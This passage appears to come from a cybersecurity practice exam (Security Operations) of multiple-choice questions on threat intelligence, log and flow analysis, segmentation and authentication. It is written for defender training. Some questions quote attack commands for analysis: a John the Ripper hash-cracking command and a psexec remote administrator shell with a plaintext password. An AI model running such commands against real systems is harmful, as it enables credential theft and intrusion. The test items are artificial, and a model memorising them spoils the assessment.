Chapter 1
Domain 1.0: Security Operations

  1. Olivia is considering potential sources for threat intelligence information that she might incorporate into her security program. Which one of the following sources is most likely to be available without a subscription fee?
    1. Vulnerability feeds
    2. Open source
    3. Closed source
    4. Proprietary
  2. Roger is evaluating threat intelligence information sources and finds that one source results in quite a few false positive alerts. This lowers his confidence level in the source. What criteria for intelligence is not being met by this source?
    1. Timeliness
    2. Expense
    3. Relevance
    4. Accuracy
  3. Brad is working on a threat classification exercise, analyzing known threats and assessing the possibility of unknown threats. Which one of the following threat actors is most likely to be associated with an advanced persistent threat (APT)?
    1. Hacktivist
    2. Nation-state
    3. Insider
    4. Organized crime
  4. What term is used to describe the groups of related organizations that pool resources to share cybersecurity threat information and analyses?
    1. SOC
    2. ISAC
    3. CERT
    4. CIRT
  5. Singh incorporated the Cisco Talos tool into his organization's threat intelligence program. He uses it to automatically look up information about the past activity of IP addresses sending email to his mail servers. What term best describes this intelligence source?
    1. Open source
    2. Behavioral
    3. Reputational
    4. Indicator of compromise
  6. Jamal is assessing the risk to his organization from their planned use of AWS Lambda, a serverless computing service that allows developers to write code and execute functions directly on the cloud platform. What cloud tier best describes this service?
    1. SaaS
    2. PaaS
    3. IaaS
    4. FaaS
  7. Lauren's honeynet, shown here, is configured to use a segment of unused network space that has no legitimate servers in it. This design is particularly useful for detecting what types of threats?
    An illustration of Lauren’s honeynet. It has a border router, firewall or unified security device, internal trusted zone, honeynet, and internet.
    1. Zero-day attacks
    2. SQL injection
    3. Network scans
    4. DDoS attacks
  8. Fred believes that the malware he is tracking uses a fast flux DNS network, which associates many IP addresses with a single fully qualified domain name as well as using multiple download hosts. How many distinct hosts should he review based on the NetFlow shown here?
    Date flow start                Duration   Proto   Src IP Addr:Port->Dst IP Addr:Port   Packets   Bytes   Flows
    2020-07-11        14:39:30.606 0.448    TCP      192.168.2.1:1451->10.2.3.1:443      10        1510    1
    2020-07-11        14:39:30.826 0.448    TCP      10.2.3.1:443->192.168.2.1:1451      7         360     1
    2020-07-11        14:45:32.495 18.492   TCP      10.6.2.4:443->192.168.2.1:1496      5         1107    1
    2020-07-11        14:45:32.255 18.888   TCP      192.168.2.1:1496->10.6.2.4:443      11        1840    1
    2020-07-11        14:46:54.983 0.000    TCP      192.168.2.1:1496->10.6.2.4:443      1         49      1
    2020-07-11        16:45:34.764 0.362    TCP      10.6.2.4:443->192.168.2.1:4292      4         1392    1
    2020-07-11        16:45:37.516 0.676    TCP      192.168.2.1:4292->10.6.2.4:443      4         462     1
    2020-07-11        16:46:38.028 0.000    TCP      192.168.2.1:4292->10.6.2.4:443      2         89      1
    2020-07-11        14:45:23.811 0.454    TCP      192.168.2.1:1515->10.6.2.5:443      4         263     1
    2020-07-11        14:45:28.879 1.638    TCP      192.168.2.1:1505->10.6.2.5:443      18        2932    1
    2020-07-11        14:45:29.087 2.288    TCP      10.6.2.5:443->192.168.2.1:1505      37        48125   1
    2020-07-11        14:45:54.027 0.224    TCP      10.6.2.5:443->192.168.2.1:1515      2         1256    1
    2020-07-11        14:45:58.551 4.328    TCP      192.168.2.1:1525->10.6.2.5:443      10        648     1
    2020-07-11        14:45:58.759 0.920    TCP      10.6.2.5:443->192.168.2.1:1525      12        15792   1
    2020-07-11        14:46:32.227 14.796   TCP      192.168.2.1:1525->10.8.2.5:443      31        1700    1
    2020-07-11        14:46:52.983 0.000    TCP      192.168.2.1:1505->10.8.2.5:443      1         40      1
    
    1. 1
    2. 3
    3. 4
    4. 5
  9. Which one of the following functions is not a common recipient of threat intelligence information?
    1. Legal counsel
    2. Risk management
    3. Security engineering
    4. Detection and monitoring
  10. Alfonzo is an IT professional at a Portuguese university who is creating a cloud environment for use only by other Portuguese universities. What type of cloud deployment model is he using?
    1. Public cloud
    2. Private cloud
    3. Hybrid cloud
    4. Community cloud
  11. As a member of a blue team, Lukas observed the following behavior during an external penetration test. What should he report to his managers at the conclusion of the test?
    A window page presents the network latency and packet loss.
    1. A significant increase in latency.
    2. A significant increase in packet loss.
    3. Latency and packet loss both increased.
    4. No significant issues were observed.
  12. The company that Maria works for is making significant investments in infrastructure-as-a-service hosting to replace its traditional datacenter. Members of her organization's management have expressed concerns about data remanence when Maria's team moves from one virtual host to another in their cloud service provider's environment. What should she instruct her team to do to avoid this concern?
    1. Zero-wipe drives before moving systems.
    2. Use full-disk encryption.
    3. Use data masking.
    4. Span multiple virtual disks to fragment data.
  13. Geoff is reviewing logs and sees a large number of attempts to authenticate to his VPN server using many different username and password combinations. The same usernames are attempted several hundred times before moving on to the next one. What type of attack is most likely taking place?
    1. Credential stuffing
    2. Password spraying
    3. Brute-force
    4. Rainbow table
  14. Kaiden is configuring a SIEM service in his IaaS cloud environment that will receive all of the log entries generated by other devices in that environment. Which one of the following risks is greatest with this approach in the event of a DoS attack or other outage?
    1. Inability to access logs
    2. Insufficient logging
    3. Insufficient monitoring
    4. Insecure API
  15. Azra believes that one of her users may be taking malicious action on the systems she has access to. When she walks past the user's desktop, she sees the following command on the screen:
    user12@workstation:/home/user12# ./john -wordfile:/home/user12/mylist.txt -format:lm hash.txt

    What is the user attempting to do?
    1. They are attempting to hash a file.
    2. They are attempting to crack hashed passwords.
    3. They are attempting to crack encrypted passwords.
    4. They are attempting a pass-the-hash attack.
  16. Lucas believes that an attacker has successfully compromised his web server. Using the following output of ps, identify the process ID he should focus on:
    root      507  0.0  0.1 258268  3288 ?     Ssl  15:52  0:00 /usr/sbin/rsyslogd -n
    message+  508  0.0  0.2  44176  5160 ?     Ss   15:52  0:00 /usr/bin/dbusdaemon --system --address=systemd: --nofork --nopidfile --systemd-activa
    root      523  0.0  0.3 281092  6312 ?     Ssl  15:52  0:00 /usr/lib/accountsservice/accounts-daemon
    root      524  0.0  0.7 389760 15956 ?     Ssl  15:52  0:00 /usr/sbin/NetworkManager --no-daemon
    root      527  0.0  0.1  28432  2992 ?     Ss   15:52  0:00 /lib/systemd/systemd-logind
    apache    714  0.0  0.1  27416  2748 ?     Ss   15:52  0:00 /www/temp/webmin
    root      617  0.0  0.1  19312  2056 ?     Ss   15:52  0:00 /usr/sbin/irqbalance --pid=/var/run/irqbalance.pid
    root      644  0.0  0.1 245472  2444 ?     Sl   15:52  0:01 /usr/sbin/VBoxService
    root      653  0.0  0.0  12828  1848 tty1  Ss+  15:52  0:00 /sbin/agetty --noclear tty1 linux
    root      661  0.0  0.3 285428  8088 ?     Ssl  15:52  0:00 /usr/lib/policykit-1/polkitd --no-debug
    root      663  0.0  0.3 364752  7600 ?     Ssl  15:52  0:00 /usr/sbin/gdm3
    root      846  0.0  0.5 285816 10884 ?     Ssl  15:53  0:00 /usr/lib/upower/upowerd
    root      867  0.0  0.3 235180  7272 ?     Sl   15:53  0:00 gdm-session-worker [pam/gdm-launch-environment]
    Debian-+  877  0.0  0.2  46892  4816 ?     Ss   15:53  0:00 /lib/systemd/systemd --user
    Debian-+  878  0.0  0.0  62672  1596 ?     S    15:53  0:00 (sd-pam)
    
    1. 508
    2. 617
    3. 846
    4. 714
  17. Geoff is responsible for hardening systems on his network and discovers that a number of network appliances have exposed services, including telnet, FTP, and web servers. What is his best option to secure these systems?
    1. Enable host firewalls.
    2. Install patches for those services.
    3. Turn off the services for each appliance.
    4. Place a network firewall between the devices and the rest of the network.
  18. While conducting reconnaissance of his own organization, Ian discovers that multiple certificates are self-signed. What issue should he report to his management?
    1. Self-signed certificates do not provide secure encryption for site visitors.
    2. Self-signed certificates can be revoked only by the original creator.
    3. Self-signed certificates will cause warnings or error messages.
    4. None of the above.
  19. Brandon wants to perform a WHOIS query for a system he believes is located in Europe. Which NIC should he select to have the greatest likelihood of success for his query?
    1. AFRINIC
    2. APNIC
    3. RIPE
    4. LACNIC
  20. While reviewing Apache logs, Janet sees the following entries as well as hundreds of others from the same source IP address. What should Janet report has occurred?
    [ 21/Jul/2020:02:18:33 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0
    [ 21/Jul/2020:02:18:35 -0500] - - 10.0.1.1 "GET /scripts/test.php" "-" 302 336 0
    [ 21/Jul/2020:02:18:37 -0500] - - 10.0.1.1 "GET /scripts/manage.php" "-" 302 336 0
    [ 21/Jul/2020:02:18:38 -0500] - - 10.0.1.1 "GET /scripts/download.php" "-" 302 336 0
    [ 21/Jul/2020:02:18:40 -0500] - - 10.0.1.1 "GET /scripts/update.php" "-" 302 336 0
    [ 21/Jul/2020:02:18:42 -0500] - - 10.0.1.1 "GET /scripts/new.php" "-" 302 336 0
    
    1. A denial-of-service attack
    2. A vulnerability scan
    3. A port scan
    4. A directory traversal attack
  21. Scott is part of the white team that is overseeing his organization's internal red and blue teams during an exercise that requires each team to only perform actions appropriate to the penetration test phase they are in. During the reconnaissance phase, he notes the following behavior as part of a Wireshark capture. What should he report?
    A window page presents the number, time, source, destination, protocol, length, and information data.
    1. The blue team has succeeded.
    2. The red team is violating the rules of engagement.
    3. The red team has succeeded.
    4. The blue team is violating the rules of engagement.
  22. Jennifer analyzes a Wireshark packet capture from a network that she is unfamiliar with. She discovers that a host with IP address 10.11.140.13 is running services on TCP ports 636 and 443. What services is that system most likely running?
    1. LDAPS and HTTPS
    2. FTPS and HTTPS
    3. RDP and HTTPS
    4. HTTP and Secure DNS
  23. While tracking a potential APT on her network, Cynthia discovers a network flow for her company's central file server. What does this flow entry most likely show if 10.2.2.3 is not a system on her network?
    Date flow start                Duration   Proto   Src IP Addr:Port->Dst IP Addr:Port   Packets   Bytes    Flows
    2017-07-11          13:06:46.343 21601804   TCP   10.1.1.1:1151->10.2.2.3:443       9473640    9.1 G    1
    2017-07-11          13:06:46.551 21601804   TCP   10.2.2.3:443->10.1.1.1:1151       8345101    514 M    1
    
    1. A web browsing session
    2. Data exfiltration
    3. Data infiltration
    4. A vulnerability scan
  24. During a regularly scheduled PCI compliance scan, Fred has discovered port 3389 open on one of the point-of-sale terminals that he is responsible for managing. What service should he expect to find enabled on the system?
    1. MySQL
    2. RDP
    3. TOR
    4. Jabber
  25. Saanvi knows that the organization she is scanning runs services on alternate ports to attempt to reduce scans of default ports. As part of her intelligence-gathering process, she discovers services running on ports 8080 and 8443. What services are most likely running on these ports?
    1. Botnet C&C
    2. Nginx
    3. Microsoft SQL Server instances
    4. Web servers
  26. Kwame is reviewing his team's work as part of a reconnaissance effort and is checking Wireshark packet captures. His team reported no open ports on 10.0.2.15. What issue should he identify with their scan based on the capture shown here?
    A window page presents the number, time, source, destination, protocol, length, and information data.
    1. The host was not up.
    2. Not all ports were scanned.
    3. The scan scanned only UDP ports.
    4. The scan was not run as root.
  27. Angela wants to gather network traffic from systems on her network. What tool can she use to best achieve this goal?
    1. Nmap
    2. Wireshark
    3. Sharkbait
    4. Dradis
  28. Wang submits a suspected malware file to malwr.com and receives the following information about its behavior. What type of tool is malwr.com?
    An illustration presents a set of lists under signatures.
    1. A reverse-engineering tool
    2. A static analysis sandbox
    3. A dynamic analysis sandbox
    4. A decompiler sandbox
  29. Which sources are most commonly used to gather information about technologies a target organization uses during intelligence gathering?
    1. OSINT searches of support forums and social engineering
    2. Port scanning and social engineering
    3. Social media review and document metadata
    4. Social engineering and document metadata
  30. Sarah has been asked to assess the technical impact of suspected reconnaissance performed against her organization. She is informed that a reliable source has discovered that a third party has been performing reconnaissance by querying WHOIS data. How should Sarah categorize the technical impact of this type of reconnaissance?
    1. High.
    2. Medium.
    3. Low.
    4. She cannot determine this from the information given.
  31. Rick is reviewing flows of a system on his network and discovers the following flow logs. What is the system doing?
    ICMP "Echo request"
    Date flow start   Duration       Proto         Src IP Addr:Port->Dst IP Addr:Port   Packets   Bytes   Flows
    2019-07-11        04:58:59.518   10.000 ICMP   10.1.1.1:0->10.2.2.6:8.0             11        924     1
    2019-07-11        04:58:59.518   10.000 ICMP   10.2.2.6:0->10.1.1.1:0.0             11        924     1
    2019-07-11        04:58:59.518   10.000 ICMP   10.1.1.1:0->10.2.2.7:8.0             11        924     1
    2019-07-11        04:58:59.518   10.000 ICMP   10.2.2.7:0->10.1.1.1:0.0             11        924     1
    2019-07-11        04:58:59.518   10.000 ICMP   10.1.1.1:0->10.2.2.8:8.0             11        924     1
    2019-07-11        04:58:59.518   10.000 ICMP   10.2.2.8:0->10.1.1.1:0.0             11        924     1
    2019-07-11        04:58:59.518   10.000 ICMP   10.1.1.1:0->10.2.2.9:8.0             11        924     1
    2019-07-11        04:58:59.518   10.000 ICMP   10.2.2.9:0->10.1.1.1:0.0             11        924     1
    2019-07-11        04:58:59.518   10.000 ICMP   10.1.1.1:0->10.2.2.10:8.0            11        924     1
    2019-07-11        04:58:59.518   10.000 ICMP   10.2.2.10:0->10.1.1.1:0.0            11        924     1
    2019-07-11        04:58:59.518   10.000 ICMP   10.1.1.1:0->10.2.2.6:11.0            11        924     1
    2019-07-11        04:58:59.518   10.000 ICMP   10.2.2.11:0->10.1.1.1:0.0            11        924     1
    
    1. A port scan
    2. A failed three-way handshake
    3. A ping sweep
    4. A traceroute
  32. Ryan's passive reconnaissance efforts resulted in the following packet capture. Which of the following statements cannot be verified based on the packet capture shown for the host with IP address 10.0.2.4?
    An illustration of the packet capture produced by Ryan's passive reconnaissance, showing traffic for the host with IP address 10.0.2.4.
    1. The host does not have a DNS entry.
    2. It is running a service on port 139.
    3. It is running a service on port 445.
    4. It is a Windows system.
  33. Kevin is concerned that an employee of his organization might fall victim to a phishing attack and wants to redesign his social engineering awareness program. What type of threat is he most directly addressing?
    1. Nation-state
    2. Hacktivist
    3. Unintentional insider
    4. Intentional insider
  34. What purpose does a honeypot system serve when placed on a network as shown in the following diagram?
    An illustration of honeypot system. It has a border router, firewall or unified security device, internal trusted zone, honeypot, and internet.
    1. It prevents attackers from targeting production servers.
    2. It provides information about the techniques attackers are using.
    3. It slows down attackers like sticky honey.
    4. It provides real-time input to IDSs and IPSs.
  35. A tarpit, or a system that looks vulnerable but actually is intended to slow down attackers, is an example of what type of technique?
    1. A passive defense
    2. A sticky defense
    3. An active defense
    4. A reaction-based defense
  36. Susan needs to test thousands of submitted binaries. She needs to ensure that the applications do not contain malicious code. What technique is best suited to this need?
    1. Sandboxing
    2. Implementing a honeypot
    3. Decompiling and analyzing the application code
    4. Fagan testing
  37. Manesh downloads a new security tool and checks its MD5. What does she know about the software she downloaded if she receives the following message?
    root@demo:~# md5sum -c demo.md5
    demo.txt: FAILED
    md5sum: WARNING: 1 computed checksum did NOT match
    
    1. The file has been corrupted.
    2. Attackers have modified the file.
    3. The files do not match.
    4. The test failed and provided no answer.
  38. Aziz needs to provide SSH access to systems behind his datacenter firewall. If Aziz's organization uses the system architecture shown here, what is the system at point A called?
    A system architecture. It involves internet, datacenter servers, firewall or unified security device, and SSH connection.
    1. A firewall-hopper
    2. An isolated system
    3. A moat-protected host
    4. A jump box
  39. During his analysis of a malware sample, Sahib reviews the malware files and binaries without running them. What type of analysis is this?
    1. Automated analysis
    2. Dynamic analysis
    3. Static analysis
    4. Heuristic analysis
  40. Carol wants to analyze a malware sample that she has discovered. She wants to run the sample safely while capturing information about its behavior and impact on the system it infects. What type of tool should she use?
    1. A static code analysis tool
    2. A dynamic analysis sandbox tool
    3. A Fagan sandbox
    4. A decompiler running on an isolated VM
  41. Susan is reviewing files on a Windows workstation and believes that cmd.exe has been replaced with a malware package. Which of the following is the best way to validate her theory?
    1. Submit cmd.exe to VirusTotal.
    2. Compare the hash of cmd.exe to a known good version.
    3. Check the file using the National Software Reference Library.
    4. Run cmd.exe to make sure its behavior is normal.
  42. Nishi is deploying a new application that will process sensitive health information about her organization's clients. To protect this information, the organization is building a new network that does not share any hardware or logical access credentials with the organization's existing network. What approach is Nishi adopting?
    1. Network interconnection
    2. Network segmentation
    3. Virtual LAN (VLAN) isolation
    4. Virtual private network (VPN)
  43. Bobbi is deploying a single system that will be used to manage a sensitive industrial control process. This system will operate in a stand-alone fashion and not have any connection to other networks. What strategy is Bobbi deploying to protect this SCADA system?
    1. Network segmentation
    2. VLAN isolation
    3. Airgapping
    4. Logical isolation
  44. Geoff has been asked to identify a technical solution that will reduce the risk of captured or stolen passwords being used to allow access to his organization's systems. Which of the following technologies should he recommend?
    1. Captive portals
    2. Multifactor authentication
    3. VPNs
    4. OAuth
  45. The company that Amanda works for is making significant investments in infrastructure-as-a-service hosting to replace their traditional datacenter. Members of her organization's management have expressed concerns about data remanence when Amanda's team moves from one virtual host to another in their cloud service provider's environment. What should she instruct her team to do to avoid this concern?
    1. Perform zero-wipe drives before moving systems.
    2. Use full-disk encryption.
    3. Use data masking.
    4. Span multiple virtual disks to fragment data.
  46. Which one of the following technologies is not typically used to implement network segmentation?
    1. Host firewall
    2. Network firewall
    3. VLAN tagging
    4. Routers and switches
  47. Ian has been asked to deploy a secure wireless network in parallel with a public wireless network inside his organization's buildings. What type of segmentation should he implement to do so without adding additional costs and complexity?
    1. SSID segmentation
    2. Logical segmentation
    3. Physical segmentation
    4. WPA segmentation
  48. Barbara has segmented her virtualized servers using VMware to ensure that the networks remain secure and isolated. What type of attack could defeat her security design?
    1. VLAN hopping
    2. 802.1q trunking vulnerabilities
    3. Compromise of the underlying VMware host
    4. BGP route spoofing
  49. What major issue would Charles face if he relied on hashing malware packages to identify malware packages?
    1. Hashing can be spoofed.
    2. Collisions can result in false positives.
    3. Hashing cannot identify unknown malware.
    4. Hashing relies on unencrypted malware samples.
  50. Noriko wants to ensure that attackers cannot access his organization's building automation control network. Which of the following segmentation options provides the strongest level of assurance that this will not happen?
    1. Air gap
    2. VLANs
    3. Network firewalls
    4. Host firewalls

    Use the following scenario for questions 51–53.

    Angela is a security practitioner at a midsize company that recently experienced a serious breach due to a successful phishing attack. The company has committed to changing its security practices across the organization and has assigned Angela to determine the best strategy to make major changes that will have a significant impact right away.

  51. Angela's company has relied on passwords as its authentication factor for years. The current organizational standard is to require an eight-character, complex password and to require a password change every 12 months. What recommendation should Angela make to significantly decrease the likelihood of a similar phishing attack and breach in the future?
    1. Increase the password length.
    2. Shorten the password lifespan.
    3. Deploy multifactor authentication.
    4. Add a PIN to all logins.
  52. Angela has decided to roll out a multifactor authentication system. What are the two most common factors used in MFA systems?
    1. Location and knowledge
    2. Knowledge and possession
    3. Knowledge and biometric
    4. Knowledge and location
  53. Angela's multifactor deployment includes the ability to use text (SMS) messages to send the second factor for authentication. What issues should she point out?
    1. VoIP hacks and SIM swapping.
    2. SMS messages are logged on the recipient's phones.
    3. PIN hacks and SIM swapping.
    4. VoIP hacks and PIN hacks.
  54. What purpose does the OpenFlow protocol serve in software-defined networks?
    1. It captures flow logs from devices.
    2. It allows software-defined network controllers to push changes to devices to manage the network.
    3. It sends flow logs to flow controllers.
    4. It allows devices to push changes to SDN controllers to manage the network.
  55. Rick's security research company wants to gather data about current attacks and sets up a number of intentionally vulnerable systems that allow his team to log and analyze exploits and attack tools. What type of environment has Rick set up?
    1. A tarpit
    2. A honeypot
    3. A honeynet
    4. A blackhole
  56. Kalea wants to prevent DoS attacks against her serverless application from driving up her costs when using a cloud service. What technique is not an appropriate solution for her need?
    1. Horizontal scaling
    2. API keys
    3. Setting a cap on API invocations for a given timeframe
    4. Using timeouts
  57. What is the key difference between virtualization and containerization?
    1. Virtualization gives operating systems direct access to the hardware, whereas containerization does not allow applications to directly access the hardware.
    2. Virtualization lets you run multiple operating systems on a single physical system, whereas containerization lets you run multiple applications on the same system.
    3. Virtualization is necessary for containerization, but containerization is not necessary for virtualization.
    4. There is not a key difference; they are elements of the same technology.
  58. Brandon is designing the hosting environment for containerized applications. Application group A has personally identifiable information, application group B has health information with different legal requirements for handling, and application group C has business-sensitive data handling requirements. What is the most secure design for his container orchestration environment given the information he has?
    1. Run a single, highly secured container host with encryption for data at rest.
    2. Run a container host for each application group and secure them based on the data they contain.
    3. Run a container host for groups A and B, and run a lower-security container host for group C.
    4. Run a container host for groups A and C, and run a health information–specific container host for group B due to the health information it contains.
  59. Local and domain administrator accounts, root accounts, and service accounts are all examples of what type of account?
    1. Monitored accounts
    2. Privileged accounts
    3. Root accounts
    4. Unprivileged accounts
  60. Ned has discovered a key logger plugged into one of his workstations, and he believes that an attacker may have acquired usernames and passwords for all of the users of a shared workstation. Since he does not know how long the keylogger was in use or if it was used on multiple workstations, what is his best security option to prevent this and similar attacks from causing issues in the future?
    1. Multifactor authentication
    2. Password complexity rules
    3. Password lifespan rules
    4. Prevent the use of USB devices
  61. Facebook Connect, CAS, Shibboleth, and AD FS are all examples of what type of technology?
    1. Kerberos implementations
    2. Single sign-on implementations
    3. Federation technologies
    4. OAuth providers
  62. Which of the following is not a common identity protocol for federation?
    1. SAML
    2. OpenID
    3. OAuth
    4. Kerberos
  63. Naomi wants to enforce her organization's security policies on cloud service users. What technology is best suited to this?
    1. OAuth
    2. CASB
    3. OpenID
    4. DMARC
  64. Elliott wants to encrypt data sent between his servers. What protocol is most commonly used for secure web communications over a network?
    1. TLS
    2. SSL
    3. IPsec
    4. PPTP
  65. What occurs when a website's certificate expires?
    1. Web browsers will report an expired certificate to users.
    2. The website will no longer be accessible.
    3. The certificate will be revoked.
    4. All of the above.
  66. What term is used to describe defenses that obfuscate the attack surface of an organization by deploying decoys and attractive targets to slow down or distract an attacker?
    1. An active defense
    2. A honeyjar
    3. A bear trap
    4. An interactive defense
  67. What technology is most commonly used to protect data in transit for modern web applications?
    1. VPN
    2. TLS
    3. SSL
    4. IPsec
  68. Anja is assessing the security of a web service implementation. Which of the following web service security requirements should she recommend to reduce the likelihood of a successful on-path/man-in-the-middle attack?
    1. Use TLS.
    2. Use XML input validation.
    3. Use XML output validation.
    4. Virus-scan files received by web service.
  69. What type of access is typically required to compromise a physically isolated and air-gapped system?
    1. Wired network access
    2. Physical access
    3. Wireless network access
    4. None of the above, because an isolated, air-gapped system cannot be accessed
  70. Amanda's organization uses an air-gap design to protect the HSM device that stores its root encryption certificate. How will Amanda need to access the device if she wants to generate a new certificate?
    Two illustrations. Organizational network (left). HSM device and console (right).
    1. Wirelessly from her laptop
    2. Over the wired network from her PC
    3. From a system on the air-gapped network
    4. Amanda cannot access the device without physical access to it
  71. Which of the following parties directly communicate with the end user during a SAML transaction?
    1. The relying party
    2. The SAML identity provider
    3. Both the relying party and the identity provider
    4. Neither the relying party nor the identity provider
  72. Support for AES, 3DES, ECC, and SHA-256 are all examples of what?
    1. Encryption algorithms
    2. Hashing algorithms
    3. Processor security extensions
    4. Bus encryption modules
  73. Which of the following is not a benefit of physical segmentation?
    1. Easier visibility into traffic
    2. Improved network security
    3. Reduced cost
    4. Increased performance
  74. Which of the following options is most effective in preventing known password attacks against a web application?
    1. Account lockouts
    2. Password complexity settings
    3. CAPTCHAs
    4. Multifactor authentication
  75. Which of the following is not a common use case for network segmentation?
    1. Creating a VoIP network
    2. Creating a shared network
    3. Creating a guest wireless network
    4. Creating trust zones
  76. What three layers make up a software-defined network?
    1. Application, Datagram, and Physical layers
    2. Application, Control, and Infrastructure layers
    3. Control, Infrastructure, and Session layers
    4. Data link, Presentation, and Transport layers
  77. Micah is designing a containerized application security environment and wants to ensure that the container images he is deploying do not introduce security issues due to vulnerable applications. What can he integrate into the CI/CD pipeline to help prevent this?
    1. Automated checking of application hashes against known good versions
    2. Automated vulnerability scanning
    3. Automated fuzz testing
    4. Automated updates
  78. Camille wants to integrate with a federation. What will she need to authenticate her users to the federation?
    1. An IDP
    2. A SP
    3. An API gateway
    4. An SSO server
  79. Brandon needs to deploy containers with different purposes, data sensitivity levels, and threat postures to his container environment. How should he group them?
    1. Segment containers by purpose
    2. Segment containers by data sensitivity
    3. Segment containers by threat model
    4. All of the above
  80. What issues should Brandon consider before choosing to use the vulnerability management tools he has in his non-container-based security environment?
    1. Vulnerability management tools may make assumptions about host durability.
    2. Vulnerability management tools may make assumptions about update mechanisms and frequencies.
    3. Both A and B.
    4. Neither A nor B.
  81. What key functionality do enterprise privileged account management tools provide?
    1. Password creation
    2. Access control to individual systems
    3. Entitlement management across multiple systems
    4. Account expiration tools
  82. Amira wants to deploy an open standard–based single sign-on (SSO) tool that supports both authentication and authorization. What open standard should she look for if she wants to federate with a broad variety of identity providers and service providers?
    1. LDAP
    2. SAML
    3. OAuth
    4. OpenID Connect
  83. Adam is testing code written for a client-server application that handles financial information and notes that traffic is sent between the client and server via TCP port 80. What should he check next?
    1. If the server stores data in unencrypted form
    2. If the traffic is unencrypted
    3. If the systems are on the same network
    4. If usernames and passwords are sent as part of the traffic
  84. Faraj wants to use statistics gained from live analysis of his network to programmatically change its performance, routing, and optimization. Which of the following technologies is best suited to his needs?
    1. Serverless
    2. Software-defined networking
    3. Physical networking
    4. Virtual private networks (VPNs)
  85. Elaine's team has deployed an application to a cloud-hosted serverless environment. Which of the following security tools can she use in that environment?
    1. Endpoint antivirus
    2. Endpoint DLP
    3. IDS for the serverless environment
    4. None of the above
  86. Lucca needs to explain the benefits of network segmentation to the leadership of his organization. Which of the following is not a common benefit of segmentation?
    1. Decreasing the attack surface
    2. Increasing the number of systems in a network segment
    3. Limiting the scope of regulatory compliance efforts
    4. Increasing availability in the case of an issue or attack
  87. Kubernetes and Docker are examples of what type of technology?
    1. Encryption
    2. Software-defined networking
    3. Containerization
    4. Serverless
  88. Nathan is designing the logging infrastructure for his company and wants to ensure that a compromise of a system will not result in the loss of that system's logs. What should he do to protect the logs?
    1. Limit log access to administrators.
    2. Encrypt the logs.
    3. Rename the log files from their common name.
    4. Send the logs to a remote server.
  89. Ansel knows he wants to use federated identities in a project he is working on. Which of the following should not be among his choices for a federated identity protocol?
    1. OpenID
    2. SAML
    3. OAuth
    4. Authman
  90. James uploads a file that he believes is potentially a malware package to VirusTotal and receives positive results, but the file is identified with multiple different malware package names. What has most likely occurred?
    1. The malware is polymorphic and is being identified as multiple viruses because it is changing.
    2. Different antimalware engines call the same malware package by different names.
    3. VirusTotal has likely misidentified the malware package, and this is a false positive.
    4. The malware contains multiple malware packages, resulting in the matches.
  91. Isaac wants to monitor live memory usage on a Windows system. What tool should he use to see memory usage in a graphical user interface?
    1. MemCheck
    2. Performance Monitor
    3. WinMem
    4. Top
  92. Abul wants to identify typical behavior on a Windows system using a built-in tool to understand memory, CPU, and disk utilization. What tool can he use to see both real-time performance and over a period of time?
    1. sysmon
    2. sysgraph
    3. resmon
    4. resgraph
  93. The automated malware analysis tool that Jose is using uses a disassembler and performs binary diffing across multiple malware binaries. What information is the tool looking for?
    1. Calculating minimum viable signature length
    2. Binary fingerprinting to identify the malware author
    3. Building a similarity graph of similar functions across binaries
    4. Heuristic code analysis of development techniques
  94. What does execution of wmic.exe, powershell.exe, or winrm.vbs most likely indicate if you discover one or more was run on a typical end user's workstation?
    1. A scripted application installation
    2. Remote execution of code
    3. A scripted application uninstallation
    4. A zero-day attack
  95. Ben is reviewing network traffic logs and notices HTTP and HTTPS traffic originating from a workstation. What TCP ports should he expect to see this traffic sent to under most normal circumstances?
    1. 80 and 443
    2. 22 and 80
    3. 80 and 8088
    4. 22 and 443
  96. While Lucy is monitoring the SIEM, she notices that all of the log sources from her organization's New York branch have stopped reporting for the past 24 hours. What type of detection rules or alerts should she configure to make sure she is aware of this sooner next time?
    1. Heuristic
    2. Behavior
    3. Availability
    4. Anomaly
  97. After her discovery in the previous question, Lucy is tasked with configuring alerts that are sent to system administrators. She builds a rule that can be represented in pseudocode as follows:

    Send an SMS alert every 30 seconds when systems do not send logs for more than 1 minute.

    The average administrator at Lucy's organization is responsible for 150–300 machines.

    What danger does Lucy's alert create?

    1. A DDoS that causes administrators to not be able to access systems
    2. A network outage
    3. Administrators may ignore or filter the alerts
    4. A memory spike
  98. Lucy configures an alert that detects when users who do not typically travel log in from other countries. What type of analysis is this?
    1. Trend
    2. Availability
    3. Heuristic
    4. Behavior
  99. Disabling unneeded services is an example of what type of activity?
    1. Threat modeling
    2. Incident remediation
    3. Proactive risk assessment
    4. Reducing the threat attack surface area
  100. Suki notices inbound traffic to a Windows system on TCP port 3389 on her corporate network. What type of traffic is she most likely seeing?
    1. A NetBIOS file share
    2. A RADIUS connection
    3. An RDP connection
    4. A Kerberos connection
  101. Ian wants to capture information about privilege escalation attacks on a Linux system. If he believes that an insider is going to exploit a flaw that allows them to use sudo to assume root privileges, where is he most likely to find log information about what occurred?
    1. The sudoers file
    2. /var/log/sudo
    3. /var/log/auth.log
    4. Root's .bash_log
  102. What type of information can Gabby determine from Tripwire logs on a Linux system if it is configured to monitor a directory?
    1. How often the directory is accessed
    2. If files in the directory have changed
    3. If sensitive data was copied out of the directory
    4. Who has viewed files in the directory
  103. While reviewing systems she is responsible for, Charlene discovers that a user has recently run the following command in a Windows console window. What has occurred?
    psexec \\10.0.11.1 -u Administrator -p examplepw cmd.exe
    
    1. The user has opened a command prompt on their workstation.
    2. The user has opened a command prompt on the desktop of a remote workstation.
    3. The user has opened an interactive command prompt as administrator on a remote workstation.
    4. The user has opened a command prompt on their workstation as Administrator.
  104. While reviewing tcpdump data, Kwame discovers that hundreds of different IP addresses are sending a steady stream of SYN packets to a server on his network. What concern should Kwame have about what is happening?
    1. A firewall is blocking connections from occurring.
    2. An IPS is blocking connections from occurring.
    3. A denial-of-service attack.
    4. An ACK blockage.
  105. While reviewing Windows event logs for a Windows system with reported odd behavior, Kai discovers that the system she is reviewing shows Event ID 1005 MALWAREPROTECTION_SCAN_FAILED every day at the same time. What is the most likely cause of this issue?
    1. The system was shut down.
    2. Another antivirus program has interfered with the scan.
    3. The user disabled the scan.
    4. The scan found a file it was unable to scan.
  106. Charles wants to use his SIEM to automatically flag known bad IP addresses. Which of the following capabilities is not typically used for this with SIEM devices?
    1. Blocklisting
    2. IP reputation
    3. Allowlisting
    4. Domain reputation
  107. Gabby executes the following command. What is she doing?
    ps -aux | grep apache2 | grep root
    
    1. Searching for all files owned by root named apache2.
